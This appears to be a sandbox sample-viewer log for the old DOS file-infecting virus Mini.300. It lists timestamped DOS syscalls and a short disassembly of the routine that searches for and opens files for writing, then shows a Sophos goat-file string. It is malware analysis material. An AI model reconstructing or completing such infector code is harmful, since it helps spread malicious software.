Sample viewer

vx.netlux.org/Virus.DOS.Mini.300

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:00:18.092615162Z 44 PC: 13e74 | Get time 0x13e74: mov ah, dh
0x13e76: shr ah, 1
0x13e78: add ah, 0x41
0x13e7b: lea dx, word ptr [bp + 0xe]
0x13e7e: mov bx, dx
0x13e80: mov byte ptr [bx], ah
0x13e82: mov cx, 0x20
0x13e85: mov ah, 0x4e
0x13e87: int 0x21
0x13e89: jae 0x13e8e
0x13e8b: jmp 0x13f30
0x13e8e: mov dx, 0x9e
0x13e91: mov ah, 0x3d
0x13e93: mov al, 2
0x13e95: int 0x21
0x13e97: jae 0x13e9c
0x13e99: jmp 0x13f30
0x13e9c: push ax
0x13e9d: mov bx, ax
0x13e9f: mov ah, 0x3f
2018-12-17T22:00:18.09520868Z 78 PC: 13e89 | Find first file
2018-12-17T22:00:18.10089584Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:00:18.106129091Z 0 PC: 12a89 | Program terminate